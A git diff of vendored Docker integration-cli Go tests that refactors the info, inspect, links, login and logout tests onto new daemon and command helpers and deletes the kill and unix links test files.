 	testRequires(c, DaemonIsLinux)
 
+	existing := existingContainerStates(c)
+
 	dockerCmd(c, "run", "-d", "busybox", "top")
 	out, _ := dockerCmd(c, "info")
-	c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1))
-	c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 1))
-	c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0))
-	c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0))
+	c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", existing["Containers"]+1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", existing["ContainersRunning"]+1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", existing["ContainersPaused"]))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", existing["ContainersStopped"]))
 }
 
 func (s *DockerSuite) TestInfoDisplaysPausedContainers(c *check.C) {
 	testRequires(c, IsPausable)
 
-	out, _ := runSleepingContainer(c, "-d")
+	existing := existingContainerStates(c)
+
+	out := runSleepingContainer(c, "-d")
 	cleanedContainerID := strings.TrimSpace(out)
 
 	dockerCmd(c, "pause", cleanedContainerID)
 
 	out, _ = dockerCmd(c, "info")
-	c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1))
-	c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0))
-	c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 1))
-	c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0))
+	c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", existing["Containers"]+1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", existing["ContainersRunning"]))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", existing["ContainersPaused"]+1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", existing["ContainersStopped"]))
 }
 
 func (s *DockerSuite) TestInfoDisplaysStoppedContainers(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 
+	existing := existingContainerStates(c)
+
 	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
 	cleanedContainerID := strings.TrimSpace(out)
 
 	dockerCmd(c, "stop", cleanedContainerID)
 
 	out, _ = dockerCmd(c, "info")
-	c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1))
-	c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0))
-	c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0))
-	c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 1))
+	c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", existing["Containers"]+1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", existing["ContainersRunning"]))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", existing["ContainersPaused"]))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", existing["ContainersStopped"]+1))
 }
 
 func (s *DockerSuite) TestInfoDebug(c *check.C) {
 	testRequires(c, SameHostDaemon, DaemonIsLinux)
 
-	d := NewDaemon(c)
-	err := d.Start("--debug")
-	c.Assert(err, checker.IsNil)
-	defer d.Stop()
+	d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
+	d.Start(c, "--debug")
+	defer d.Stop(c)
 
 	out, err := d.Cmd("--debug", "info")
 	c.Assert(err, checker.IsNil)
@@ -193,10 +198,9 @@ func (s *DockerSuite) TestInsecureRegistries(c *check.C) {
 	registryCIDR := "192.168.1.0/24"
 	registryHost := "insecurehost.com:5000"
 
-	d := NewDaemon(c)
-	err := d.Start("--insecure-registry="+registryCIDR, "--insecure-registry="+registryHost)
-	c.Assert(err, checker.IsNil)
-	defer d.Stop()
+	d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
+	d.Start(c, "--insecure-registry="+registryCIDR, "--insecure-registry="+registryHost)
+	defer d.Stop(c)
 
 	out, err := d.Cmd("info")
 	c.Assert(err, checker.IsNil)
@@ -211,8 +215,7 @@ func (s *DockerDaemonSuite) TestRegistryMirrors(c *check.C) {
 	registryMirror1 := "https://192.168.1.2"
 	registryMirror2 := "http://registry.mirror.com:5000"
 
-	err := s.d.Start("--registry-mirror="+registryMirror1, "--registry-mirror="+registryMirror2)
-	c.Assert(err, checker.IsNil)
+	s.d.Start(c, "--registry-mirror="+registryMirror1, "--registry-mirror="+registryMirror2)
 
 	out, err := s.d.Cmd("info")
 	c.Assert(err, checker.IsNil)
@@ -221,14 +224,15 @@ func (s *DockerDaemonSuite) TestRegistryMirrors(c *check.C) {
 	c.Assert(out, checker.Contains, fmt.Sprintf(" %s", registryMirror2))
 }
 
-// Test case for #24392
-func (s *DockerDaemonSuite) TestInfoLabels(c *check.C) {
-	testRequires(c, SameHostDaemon, DaemonIsLinux)
-
-	err := s.d.Start("--label", `test.empty=`, "--label", `test.empty=`, "--label", `test.label="1"`, "--label", `test.label="2"`)
-	c.Assert(err, checker.IsNil)
-
-	out, err := s.d.Cmd("info")
+func existingContainerStates(c *check.C) map[string]int {
+	out, _ := dockerCmd(c, "info", "--format", "{{json .}}")
+	var m map[string]interface{}
+	err := json.Unmarshal([]byte(out), &m)
 	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, "WARNING: labels with duplicate keys and conflicting values have been deprecated")
+	res := map[string]int{}
+	res["Containers"] = int(m["Containers"].(float64))
+	res["ContainersRunning"] = int(m["ContainersRunning"].(float64))
+	res["ContainersPaused"] = int(m["ContainersPaused"].(float64))
+	res["ContainersStopped"] = int(m["ContainersStopped"].(float64))
+	return res
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go
index b9323060dd..d55c05c4a5 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go
@@ -3,7 +3,7 @@
 package main
 
 import (
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go
index 32ed28afe1..d027c44775 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go
@@ -4,15 +4,15 @@ import (
 	"encoding/json"
 	"fmt"
 	"os"
-	"os/exec"
 	"strconv"
 	"strings"
 	"time"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func checkValidGraphDriver(c *check.C, name string) {
@@ -53,10 +53,7 @@ func (s *DockerSuite) TestInspectDefault(c *check.C) {
 }
 
 func (s *DockerSuite) TestInspectStatus(c *check.C) {
-	if daemonPlatform != "windows" {
-		defer unpauseAllContainers()
-	}
-	out, _ := runSleepingContainer(c, "-d")
+	out := runSleepingContainer(c, "-d")
 	out = strings.TrimSpace(out)
 
 	inspectOut := inspectField(c, out, "State.Status")
@@ -64,7 +61,7 @@ func (s *DockerSuite) TestInspectStatus(c *check.C) {
 
 	// Windows does not support pause/unpause on Windows Server Containers.
 	// (RS1 does for Hyper-V Containers, but production CI is not setup for that)
-	if daemonPlatform != "windows" {
+	if testEnv.OSType != "windows" {
 		dockerCmd(c, "pause", out)
 		inspectOut = inspectField(c, out, "State.Status")
 		c.Assert(inspectOut, checker.Equals, "paused")
@@ -142,11 +139,12 @@ func (s *DockerSuite) TestInspectImageFilterInt(c *check.C) {
 }
 
 func (s *DockerSuite) TestInspectContainerFilterInt(c *check.C) {
-	runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat")
-	runCmd.Stdin = strings.NewReader("blahblah")
-	out, _, _, err := runCommandWithStdoutStderr(runCmd)
-	c.Assert(err, checker.IsNil, check.Commentf("failed to run container: %v, output: %q", err, out))
-
+	result := icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat"},
+		Stdin:   strings.NewReader("blahblah"),
+	})
+	result.Assert(c, icmd.Success)
+	out := result.Stdout()
 	id := strings.TrimSpace(out)
 
 	out = inspectField(c, id, "State.ExitCode")
@@ -157,9 +155,9 @@ func (s *DockerSuite) TestInspectContainerFilterInt(c *check.C) {
 	//now get the exit code to verify
 	formatStr := fmt.Sprintf("--format={{eq .State.ExitCode %d}}", exitCode)
 	out, _ = dockerCmd(c, "inspect", formatStr, id)
-	result, err := strconv.ParseBool(strings.TrimSuffix(out, "\n"))
+	inspectResult, err := strconv.ParseBool(strings.TrimSuffix(out, "\n"))
 	c.Assert(err, checker.IsNil)
-	c.Assert(result, checker.Equals, true)
+	c.Assert(inspectResult, checker.Equals, true)
 }
 
 func (s *DockerSuite) TestInspectImageGraphDriver(c *check.C) {
@@ -208,12 +206,8 @@ func (s *DockerSuite) TestInspectContainerGraphDriver(c *check.C) {
 func (s *DockerSuite) TestInspectBindMountPoint(c *check.C) {
 	modifier := ",z"
 	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		modifier = ""
-		// TODO Windows: Temporary check - remove once TP5 support is dropped
-		if windowsDaemonKV < 14350 {
-			c.Skip("Needs later Windows build for RO volumes")
-		}
 		// Linux creates the host directory if it doesn't exist. Windows does not.
 		os.Mkdir(`c:\data`, os.ModeDir)
 	}
@@ -235,7 +229,7 @@ func (s *DockerSuite) TestInspectBindMountPoint(c *check.C) {
 	c.Assert(m.Driver, checker.Equals, "")
 	c.Assert(m.Source, checker.Equals, prefix+slash+"data")
 	c.Assert(m.Destination, checker.Equals, prefix+slash+"data")
-	if daemonPlatform != "windows" { // Windows does not set mode
+	if testEnv.OSType != "windows" { // Windows does not set mode
 		c.Assert(m.Mode, checker.Equals, "ro"+modifier)
 	}
 	c.Assert(m.RW, checker.Equals, false)
@@ -308,7 +302,7 @@ func (s *DockerSuite) TestInspectNoSizeFlagContainer(c *check.C) {
 
 	formatStr := "--format={{.SizeRw}},{{.SizeRootFs}}"
 	out, _ := dockerCmd(c, "inspect", "--type=container", formatStr, "busybox")
-	c.Assert(strings.TrimSpace(out), check.Equals, "<nil>,<nil>", check.Commentf("Exepcted not to display size info: %s", out))
+	c.Assert(strings.TrimSpace(out), check.Equals, "<nil>,<nil>", check.Commentf("Expected not to display size info: %s", out))
 }
 
 func (s *DockerSuite) TestInspectSizeFlagContainer(c *check.C) {
@@ -356,14 +350,22 @@ func (s *DockerSuite) TestInspectByPrefix(c *check.C) {
 }
 
 func (s *DockerSuite) TestInspectStopWhenNotFound(c *check.C) {
-	runSleepingContainer(c, "--name=busybox", "-d")
-	runSleepingContainer(c, "--name=not-shown", "-d")
-	out, _, err := dockerCmdWithError("inspect", "--type=container", "--format='{{.Name}}'", "busybox", "missing", "not-shown")
-
-	c.Assert(err, checker.Not(check.IsNil))
-	c.Assert(out, checker.Contains, "busybox")
-	c.Assert(out, checker.Not(checker.Contains), "not-shown")
-	c.Assert(out, checker.Contains, "Error: No such container: missing")
+	runSleepingContainer(c, "--name=busybox1", "-d")
+	runSleepingContainer(c, "--name=busybox2", "-d")
+	result := dockerCmdWithResult("inspect", "--type=container", "--format='{{.Name}}'", "busybox1", "busybox2", "missing")
+
+	c.Assert(result.Error, checker.Not(check.IsNil))
+	c.Assert(result.Stdout(), checker.Contains, "busybox1")
+	c.Assert(result.Stdout(), checker.Contains, "busybox2")
+	c.Assert(result.Stderr(), checker.Contains, "Error: No such container: missing")
+
+	// test inspect would not fast fail
+	result = dockerCmdWithResult("inspect", "--type=container", "--format='{{.Name}}'", "missing", "busybox1", "busybox2")
+
+	c.Assert(result.Error, checker.Not(check.IsNil))
+	c.Assert(result.Stdout(), checker.Contains, "busybox1")
+	c.Assert(result.Stdout(), checker.Contains, "busybox2")
+	c.Assert(result.Stderr(), checker.Contains, "Error: No such container: missing")
 }
 
 func (s *DockerSuite) TestInspectHistory(c *check.C) {
@@ -456,11 +458,3 @@ func (s *DockerSuite) TestInspectUnknownObject(c *check.C) {
 	c.Assert(out, checker.Contains, "Error: No such object: foobar")
 	c.Assert(err.Error(), checker.Contains, "Error: No such object: foobar")
 }
-
-func (s *DockerSuite) TestInpectInvalidReference(c *check.C) {
-	// This test should work on both Windows and Linux
-	out, _, err := dockerCmdWithError("inspect", "FooBar")
-	c.Assert(err, checker.NotNil)
-	c.Assert(out, checker.Contains, "Error: No such object: FooBar")
-	c.Assert(err.Error(), checker.Contains, "Error: No such object: FooBar")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go
deleted file mode 100644
index 43164801d4..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go
+++ /dev/null
@@ -1,134 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"net/http"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestKillContainer(c *check.C) {
-	out, _ := runSleepingContainer(c, "-d")
-	cleanedContainerID := strings.TrimSpace(out)
-	c.Assert(waitRun(cleanedContainerID), check.IsNil)
-
-	dockerCmd(c, "kill", cleanedContainerID)
-	c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil)
-
-	out, _ = dockerCmd(c, "ps", "-q")
-	c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running"))
-
-}
-
-func (s *DockerSuite) TestKillOffStoppedContainer(c *check.C) {
-	out, _ := runSleepingContainer(c, "-d")
-	cleanedContainerID := strings.TrimSpace(out)
-
-	dockerCmd(c, "stop", cleanedContainerID)
-	c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil)
-
-	_, _, err := dockerCmdWithError("kill", "-s", "30", cleanedContainerID)
-	c.Assert(err, check.Not(check.IsNil), check.Commentf("Container %s is not running", cleanedContainerID))
-}
-
-func (s *DockerSuite) TestKillDifferentUserContainer(c *check.C) {
-	// TODO Windows: Windows does not yet support -u (Feb 2016).
-	testRequires(c, DaemonIsLinux)
-	out, _ := dockerCmd(c, "run", "-u", "daemon", "-d", "busybox", "top")
-	cleanedContainerID := strings.TrimSpace(out)
-	c.Assert(waitRun(cleanedContainerID), check.IsNil)
-
-	dockerCmd(c, "kill", cleanedContainerID)
-	c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil)
-
-	out, _ = dockerCmd(c, "ps", "-q")
-	c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running"))
-
-}
-
-// regression test about correct signal parsing see #13665
-func (s *DockerSuite) TestKillWithSignal(c *check.C) {
-	// Cannot port to Windows - does not support signals in the same way Linux does
-	testRequires(c, DaemonIsLinux)
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
-	cid := strings.TrimSpace(out)
-	c.Assert(waitRun(cid), check.IsNil)
-
-	dockerCmd(c, "kill", "-s", "SIGWINCH", cid)
-	time.Sleep(250 * time.Millisecond)
-
-	running := inspectField(c, cid, "State.Running")
-
-	c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after SIGWINCH"))
-}
-
-func (s *DockerSuite) TestKillWithStopSignalWithSameSignalShouldDisableRestartPolicy(c *check.C) {
-	// Cannot port to Windows - does not support signals int the same way as Linux does
-	testRequires(c, DaemonIsLinux)
-	out, _ := dockerCmd(c, "run", "-d", "--stop-signal=TERM", "--restart=always", "busybox", "top")
-	cid := strings.TrimSpace(out)
-	c.Assert(waitRun(cid), check.IsNil)
-
-	// Let docker send a TERM signal to the container
-	// It will kill the process and disable the restart policy
-	dockerCmd(c, "kill", "-s", "TERM", cid)
-	c.Assert(waitExited(cid, 10*time.Second), check.IsNil)
-
-	out, _ = dockerCmd(c, "ps", "-q")
-	c.Assert(out, checker.Not(checker.Contains), cid, check.Commentf("killed container is still running"))
-}
-
-func (s *DockerSuite) TestKillWithStopSignalWithDifferentSignalShouldKeepRestartPolicy(c *check.C) {
-	// Cannot port to Windows - does not support signals int the same way as Linux does
-	testRequires(c, DaemonIsLinux)
-	out, _ := dockerCmd(c, "run", "-d", "--stop-signal=CONT", "--restart=always", "busybox", "top")
-	cid := strings.TrimSpace(out)
-	c.Assert(waitRun(cid), check.IsNil)
-
-	// Let docker send a TERM signal to the container
-	// It will kill the process, but not disable the restart policy
-	dockerCmd(c, "kill", "-s", "TERM", cid)
-	c.Assert(waitRestart(cid, 10*time.Second), check.IsNil)
-
-	// Restart policy should still be in place, so it should be still running
-	c.Assert(waitRun(cid), check.IsNil)
-}
-
-// FIXME(vdemeester) should be a unit test
-func (s *DockerSuite) TestKillWithInvalidSignal(c *check.C) {
-	out, _ := runSleepingContainer(c, "-d")
-	cid := strings.TrimSpace(out)
-	c.Assert(waitRun(cid), check.IsNil)
-
-	out, _, err := dockerCmdWithError("kill", "-s", "0", cid)
-	c.Assert(err, check.NotNil)
-	c.Assert(out, checker.Contains, "Invalid signal: 0", check.Commentf("Kill with an invalid signal didn't error out correctly"))
-
-	running := inspectField(c, cid, "State.Running")
-	c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal"))
-
-	out, _ = runSleepingContainer(c, "-d")
-	cid = strings.TrimSpace(out)
-	c.Assert(waitRun(cid), check.IsNil)
-
-	out, _, err = dockerCmdWithError("kill", "-s", "SIG42", cid)
-	c.Assert(err, check.NotNil)
-	c.Assert(out, checker.Contains, "Invalid signal: SIG42", check.Commentf("Kill with an invalid signal error out correctly"))
-
-	running = inspectField(c, cid, "State.Running")
-	c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal"))
-
-}
-
-func (s *DockerSuite) TestKillStoppedContainerAPIPre120(c *check.C) {
-	testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later
-	runSleepingContainer(c, "--name", "docker-kill-test-api", "-d")
-	dockerCmd(c, "stop", "docker-kill-test-api")
-
-	status, _, err := sockRequest("POST", fmt.Sprintf("/v1.19/containers/%s/kill", "docker-kill-test-api"), nil)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusNoContent)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go
index a5872d9e0c..17b25d7994 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go
@@ -4,9 +4,10 @@ import (
 	"encoding/json"
 	"fmt"
 	"regexp"
+	"sort"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/docker/docker/runconfig"
 	"github.com/go-check/check"
 )
@@ -27,7 +28,9 @@ func (s *DockerSuite) TestLinksInvalidContainerTarget(c *check.C) {
 	// an invalid container target should produce an error
 	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
 	// an invalid container target should produce an error
-	c.Assert(out, checker.Contains, "Could not get container")
+	// note: convert the output to lowercase first as the error string
+	// capitalization was changed after API version 1.32
+	c.Assert(strings.ToLower(out), checker.Contains, "could not get container")
 }
 
 func (s *DockerSuite) TestLinksPingLinkedContainers(c *check.C) {
@@ -89,40 +92,41 @@ func (s *DockerSuite) TestLinksPingLinkedContainersAfterRename(c *check.C) {
 
 func (s *DockerSuite) TestLinksInspectLinksStarted(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	var (
-		expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}}
-		result   []string
-	)
 	dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top")
 	dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top")
 	dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "top")
 	links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links")
 
+	var result []string
 	err := json.Unmarshal([]byte(links), &result)
 	c.Assert(err, checker.IsNil)
 
-	output := convertSliceOfStringsToMap(result)
-
-	c.Assert(output, checker.DeepEquals, expected)
+	var expected = []string{
+		"/container1:/testinspectlink/alias1",
+		"/container2:/testinspectlink/alias2",
+	}
+	sort.Strings(result)
+	c.Assert(result, checker.DeepEquals, expected)
 }
 
 func (s *DockerSuite) TestLinksInspectLinksStopped(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	var (
-		expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}}
-		result   []string
-	)
+
 	dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top")
 	dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top")
 	dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "true")
 	links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links")
 
+	var result []string
 	err := json.Unmarshal([]byte(links), &result)
 	c.Assert(err, checker.IsNil)
 
-	output := convertSliceOfStringsToMap(result)
-
-	c.Assert(output, checker.DeepEquals, expected)
+	var expected = []string{
+		"/container1:/testinspectlink/alias1",
+		"/container2:/testinspectlink/alias2",
+	}
+	sort.Strings(result)
+	c.Assert(result, checker.DeepEquals, expected)
 }
 
 func (s *DockerSuite) TestLinksNotStartedParentNotFail(c *check.C) {
@@ -145,11 +149,8 @@ func (s *DockerSuite) TestLinksHostsFilesInject(c *check.C) {
 
 	c.Assert(waitRun(idTwo), checker.IsNil)
 
-	contentOne, err := readContainerFileWithExec(idOne, "/etc/hosts")
-	c.Assert(err, checker.IsNil, check.Commentf("contentOne: %s", string(contentOne)))
-
-	contentTwo, err := readContainerFileWithExec(idTwo, "/etc/hosts")
-	c.Assert(err, checker.IsNil, check.Commentf("contentTwo: %s", string(contentTwo)))
+	readContainerFileWithExec(c, idOne, "/etc/hosts")
+	contentTwo := readContainerFileWithExec(c, idTwo, "/etc/hosts")
 	// Host is not present in updated hosts file
 	c.Assert(string(contentTwo), checker.Contains, "onetwo")
 }
@@ -162,8 +163,7 @@ func (s *DockerSuite) TestLinksUpdateOnRestart(c *check.C) {
 	id := strings.TrimSpace(string(out))
 
 	realIP := inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress")
-	content, err := readContainerFileWithExec(id, "/etc/hosts")
-	c.Assert(err, checker.IsNil)
+	content := readContainerFileWithExec(c, id, "/etc/hosts")
 
 	getIP := func(hosts []byte, hostname string) string {
 		re := regexp.MustCompile(fmt.Sprintf(`(\S*)\t%s`, regexp.QuoteMeta(hostname)))
@@ -180,8 +180,7 @@ func (s *DockerSuite) TestLinksUpdateOnRestart(c *check.C) {
 	dockerCmd(c, "restart", "one")
 	realIP = inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress")
 
-	content, err = readContainerFileWithExec(id, "/etc/hosts")
-	c.Assert(err, checker.IsNil, check.Commentf("content: %s", string(content)))
+	content = readContainerFileWithExec(c, id, "/etc/hosts")
 	ip = getIP(content, "one")
 	c.Assert(ip, checker.Equals, realIP)
 
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go
deleted file mode 100644
index 1af927930d..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go
+++ /dev/null
@@ -1,26 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"io/ioutil"
-	"os"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestLinksEtcHostsContentMatch(c *check.C) {
-	// In a _unix file as using Unix specific files, and must be on the
-	// same host as the daemon.
-	testRequires(c, SameHostDaemon, NotUserNamespace)
-
-	out, _ := dockerCmd(c, "run", "--net=host", "busybox", "cat", "/etc/hosts")
-	hosts, err := ioutil.ReadFile("/etc/hosts")
-	if os.IsNotExist(err) {
-		c.Skip("/etc/hosts does not exist, skip this test")
-	}
-
-	c.Assert(out, checker.Equals, string(hosts), check.Commentf("container: %s\n\nhost:%s", out, hosts))
-
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go
index 01de75d985..cb261bed85 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go
@@ -4,7 +4,7 @@ import (
 	"bytes"
 	"os/exec"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
@@ -16,29 +16,15 @@ func (s *DockerSuite) TestLoginWithoutTTY(c *check.C) {
 
 	// run the command and block until it's done
 	err := cmd.Run()
-	c.Assert(err, checker.NotNil) //"Expected non nil err when loginning in & TTY not available"
+	c.Assert(err, checker.NotNil) //"Expected non nil err when logging in & TTY not available"
 }
 
 func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistry(c *check.C) {
 	// wrong credentials
-	out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", privateRegistryURL)
+	out, _, err := dockerCmdWithError("login", "-u", s.reg.Username(), "-p", "WRONGPASSWORD", privateRegistryURL)
 	c.Assert(err, checker.NotNil, check.Commentf(out))
 	c.Assert(out, checker.Contains, "401 Unauthorized")
 
 	// now it's fine
-	dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
-}
-
-func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistryDeprecatedEmailFlag(c *check.C) {
-	// Test to make sure login still works with the deprecated -e and --email flags
-	// wrong credentials
-	out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", "-e", s.reg.email, privateRegistryURL)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "401 Unauthorized")
-
-	// now it's fine
-	// -e flag
-	dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "-e", s.reg.email, privateRegistryURL)
-	// --email flag
-	dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "--email", s.reg.email, privateRegistryURL)
+	dockerCmd(c, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go
index a5f4b108cf..e0752f489c 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go
@@ -8,11 +8,13 @@ import (
 	"os/exec"
 	"path/filepath"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
 func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C) {
+	s.d.StartWithBusybox(c)
+
 	osPath := os.Getenv("PATH")
 	defer os.Setenv("PATH", osPath)
 
@@ -28,6 +30,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C)
 
 	tmp, err := ioutil.TempDir("", "integration-cli-")
 	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmp)
 
 	externalAuthConfig := `{ "credsStore": "shell-test" }`
 
@@ -35,26 +38,29 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C)
 	err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644)
 	c.Assert(err, checker.IsNil)
 
-	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+	_, err = s.d.Cmd("--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL)
+	c.Assert(err, checker.IsNil)
 
 	b, err := ioutil.ReadFile(configPath)
 	c.Assert(err, checker.IsNil)
 	c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":")
 	c.Assert(string(b), checker.Contains, privateRegistryURL)
 
-	dockerCmd(c, "--config", tmp, "tag", "busybox", repoName)
-	dockerCmd(c, "--config", tmp, "push", repoName)
-
-	dockerCmd(c, "--config", tmp, "logout", privateRegistryURL)
+	_, err = s.d.Cmd("--config", tmp, "tag", "busybox", repoName)
+	c.Assert(err, checker.IsNil)
+	_, err = s.d.Cmd("--config", tmp, "push", repoName)
+	c.Assert(err, checker.IsNil)
+	_, err = s.d.Cmd("--config", tmp, "logout", privateRegistryURL)
+	c.Assert(err, checker.IsNil)
 
 	b, err = ioutil.ReadFile(configPath)
 	c.Assert(err, checker.IsNil)
 	c.Assert(string(b), checker.Not(checker.Contains), privateRegistryURL)
 
 	// check I cannot pull anymore
-	out, _, err := dockerCmdWithError("--config", tmp, "pull", repoName)
+	out, err := s.d.Cmd("--config", tmp, "pull", repoName)
 	c.Assert(err, check.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Error: image dockercli/busybox:authtest not found")
